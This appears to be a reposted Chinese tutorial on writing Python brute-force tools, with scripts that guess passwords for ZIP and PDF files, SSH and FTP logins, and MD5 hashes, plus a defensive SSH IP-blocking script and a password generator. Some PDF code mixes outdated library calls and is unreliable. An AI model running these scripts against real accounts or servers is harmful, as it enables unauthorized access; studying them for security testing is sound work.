卡塔尔世界杯排名_98世界杯决赛 - dylfjc.com

python渗透工具编写学习笔记：6、暴力破解简单脚本

目录

前言

6.1 概念

6.2 ZIP文件

6.3 PDF文档

6.4 SSH服务器

拓展 - 防ssh暴力破解脚本

6.5 FTP服务器

6.6 解密加密哈希

6.7 制作密码生成器

6.8 密码字典

前言

密码破解程序，主要步骤为导入目标软件的API、构建密码、不断发送登录请求直至成功。当然，在构建密码破解程序时找到实用的密码字典也十分重要，我们在后文会讲到，读者也可以自行获取弱密码字典进行尝试。坚持科技向善，勿跨越法律界限。代码仅供教学目的。初出茅庐，如有错误望各位不吝赐教。

6.1 概念

密码破解程序通过尝试不同的密码组合和算法来获取被加密或隐藏的信息。密码破解程序通常是黑客或安全专家使用的工具，用于测试网络或系统的安全性。这些程序使用不同的方法和技术来猜测或破解密码，例如暴力破解、字典攻击、蛮力攻击等。

6.2 ZIP文件

暴力尝试ZIP文件密码的程序需要使用Python的zipfile库来操作ZIP文件，以及使用itertools库来生成可能的密码组合。下面是一个简单的示例程序：

import zipfile

import itertools

def brute_force_zip(file_path, max_length):

zip_file = zipfile.ZipFile(file_path)

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' # 密码字符集合

for length in range(1, max_length+1): # 密码长度从1到max_length

combinations = itertools.product(chars, repeat=length) # 生成密码组合

for password in combinations:

password = ''.join(password)

try:

zip_file.extractall(pwd=password.encode()) # 尝试解压缩文件

print(f'Success! Password is {password}')

return

except Exception as e:

pass

print('Failed to crack password')

# 使用示例

brute_force_zip('path/to/zip/file.zip', 6) # 假设密码最大长度为6

这个程序尝试使用长度为1到max_length（在示例中是6）的密码组合来暴力破解ZIP文件的密码。你可以根据需要自定义密码字符集合和密码最大长度。

6.3 PDF文档

我们可以使用Python的PyPDF2库来处理和操作PDF文档。以下是一个示例代码，用于打开和解密已知密码的PDF文档：

import PyPDF2

def decrypt_pdf(input_path, output_path, password):

with open(input_path, 'rb') as input_file, open(output_path, 'wb') as output_file:

pdf_reader = PyPDF2.PdfReader(input_file)

if not pdf_reader.isEncrypted:

raise ValueError('PDF document is not encrypted.')

# 检查密码是否正确

if not pdf_reader.decrypt(password):

raise ValueError('Invalid password.')

pdf_writer = PyPDF2.PdfWriter()

for page_num in range(len(pdf_reader.pages)):

pdf_writer.add_page(pdf_reader.getPage(page_num))

pdf_writer.write(output_file)

input_path = 'encrypted.pdf' # 输入加密的PDF文件路径

output_path = 'decrypted.pdf' # 输出解密后的PDF文件路径

password = 'password123' # 已知的密码

decrypt_pdf(input_path, output_path, password)

我们编写的decrypt_pdf函数中，需要将input_path替换成我们的目标文件路径，之后发送输入密码的请求。了解了解锁文件的正常流程之后，我们加入for遍历字典，从字典里不断提取出密码并尝试，直到返回值为Ture。那么示例如下：

import PyPDF2

def crack_pdf(file_path, password_list):

pdf_reader = PyPDF2.PdfFileReader(open(file_path, 'rb'))

for password in password_list:

if pdf_reader.decrypt(password) == 1:

print("密码已破解：", password)

return

print("未找到正确的密码")

# 设置要破解的PDF文件路径

file_path = 'path/to/pdf/file.pdf'

# 设置密码列表，可以根据实际情况进行修改

password_list = ['password1', 'password2', 'password3']

# 调用破解函数

crack_pdf(file_path, password_list)

6.4 SSH服务器

对于SSH服务器，我们可以使用python中的paramiko模块其中我们发送请求需要用到IP、端口、用户名和密码这些参数。下面是暴力破解SSH服务器的简单示例：

import paramiko

def ssh_connect(ip, username, password):

ssh = paramiko.SSHClient()

ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

try:

ssh.connect(ip, 22, username, password)

print(f"SSH Password Found: {password}")

except paramiko.AuthenticationException:

print(f"SSH Password Incorrect: {password}")

except Exception as e:

print(f"Error occurred: {e}")

ssh.close()

# 调用ssh_connect函数进行爆破

ssh_connect('192.168.0.1', 'username', 'password123')

拓展 - 防ssh暴力破解脚本

当然了，我们也有许多防治暴力破解的方法，我们可以编写一个简单的Python脚本来防止SSH暴力破解攻击。该脚本采用了基本的防御措施，如限制登录尝试次数和封禁IP地址。以下是一个参考示例：

import time

import os

import sys

def block_ip(ip):

# 将恶意IP添加到黑名单中

os.system("sudo iptables -A INPUT -s {} -j DROP".format(ip))

def unblock_ip(ip):

# 从黑名单中移除IP

os.system("sudo iptables -D INPUT -s {} -j DROP".format(ip))

def is_ip_blocked(ip):

# 检查IP是否在黑名单中

result = os.popen("sudo iptables -L INPUT -v -n | grep {}".format(ip)).read()

return len(result) > 0

def login(username, password):

# 模拟SSH登录函数

if username == "your_username" and password == "your_password":

return True

else:

return False

MAX_ATTEMPTS = 3 # 最大登录尝试次数

BLOCK_TIME = 60 # 封禁时间（秒）

def main():

ip = sys.argv[1] # 获取尝试登录的IP地址

if is_ip_blocked(ip):

print("IP地址 {} 已被封禁，请稍后再试。".format(ip))

return

attempts = 0

while attempts < MAX_ATTEMPTS:

username = input("请输入用户名：")

password = input("请输入密码：")

if login(username, password):

print("登录成功！")

return

else:

attempts += 1

print("登录失败，请重新输入。")

if attempts >= MAX_ATTEMPTS:

print("登录尝试达到最大次数，将封禁IP地址 {}。".format(ip))

block_ip(ip)

time.sleep(BLOCK_TIME)

unblock_ip(ip)

if __name__ == '__main__':

main()

注：这只是一个简单的示例，您可能还需要根据自己的需求进行修改和改进。还要确保您以管理员权限运行该脚本，以便执行阻止IP的iptables命令。

6.5 FTP服务器

FTP服务器，我们可以使用python中的ftplib、tqdm与itertools模块其中我们发送请求需要用到服务器网址(域名)、端口、用户名和密码这些参数。下面是暴力破解FTP服务器的简单示例：

import ftplib

from tqdm import tqdm

import itertools

# FTP服务器信息

host = 'ftp.example.com'

port = 21

# 用户名和密码列表

usernames = ['admin', 'root', 'guest']

passwords = ['password123', 'admin123', 'root123', 'guest123', 'test123']

# 创建进度条

total_combinations = len(usernames) * len(passwords)

progress_bar = tqdm(total=total_combinations, desc='Progress', unit='combination')

# 尝试所有可能的用户名和密码组合

for username in usernames:

for password in passwords:

try:

# 连接FTP服务器

ftp = ftplib.FTP()

ftp.connect(host, port)

# 尝试登录

ftp.login(username, password)

# 登录成功

print(f'Successful login: {username}:{password}')

# 关闭连接

ftp.quit()

except ftplib.error_perm as e:

# 登录失败

print(f'Failed login: {username}:{password}')

# 更新进度条

progress_bar.update(1)

# 关闭进度条

progress_bar.close()

6.6 解密加密哈希

哈希用于安全地存储敏感信息，例如密码。它们被设计为单向的，这意味着在计算上不可能逆转该过程并从哈希中获取原始数据。哈希破解器是一种用于破解哈希函数加密的工具，其原理是根据已知的哈希值和哈希函数的特性，尝试不同的输入值，直到找到与目标哈希值匹配的输入。我们将使用Python 的内置 hashlib 库并构建一个哈希破解器。以下是一个哈希破解器示例

import hashlib

def crack_hash(hash_value, wordlist):

with open(wordlist, 'r') as file:

for line in file:

word = line.strip()

hashed_word = hashlib.md5(word.encode()).hexdigest()

if hashed_word == hash_value:

return word

return "Hash not found in wordlist"

hash_value = "098f6bcd4621d373cade4e832627b4f6" # 假设这是要破解的哈希值

wordlist = "wordlist.txt" # 假设这是包含可能的明文的字典文件

result = crack_hash(hash_value, wordlist)

print("Cracked hash: ", result)

6.7 制作密码生成器

那么，如何避免以上破解手段将我们的密码轻而易举地破解呢？我们来制作一个高级密码生成器，可让您创建强密码，可以帮助我们避免被暴力破解轻易的攻击。我们来制作一个简单的强密码生成器：

import random

import string

def generate_password(length):

# 定义密码字符集合

characters = string.ascii_letters + string.digits + string.punctuation

# 在字符集合中随机选择length个字符

password = ''.join(random.choice(characters) for _ in range(length))

return password

# 输入所需密码长度

length = int(input("请输入密码长度："))

# 生成密码

password = generate_password(length)

print("生成的密码为：", password)

运行该代码后，程序会要求输入所需密码的长度，然后生成一个随机的强密码。密码字符集合包括大小写字母、数字和特殊字符，可以根据自己的需求进行调整。

6.8 密码字典

在本章的最后，我们来讲讲密码字典。密码字典是一种预先创建的包含了常见密码和密码变体的列表。密码字典是哈希破解攻击中的一种常用工具，用于尝试不同的密码。

密码字典可以包含以下类型的密码：

常用密码：这些是用户常常使用的密码，如"123456"、"password"、"qwerty"等。字典单词：这些是从字典中提取的常见单词，如"football"、"sunshine"、"dragon"等。变体密码：这些是对常见密码进行变体的组合，如将数字替换为特殊符号，如"p@ssw0rd"。常见模式：这些是根据用户惯用的密码模式创建的密码，如"Password2021"、"CompanyName123"等。

我们可以在kali系统中或是论坛里找到许多使用的密码字典，但是暴力破解只能去尝试一些简单密码，并不是长久之道。那么这就是今天的全部内容了，如有帮助，不胜荣幸。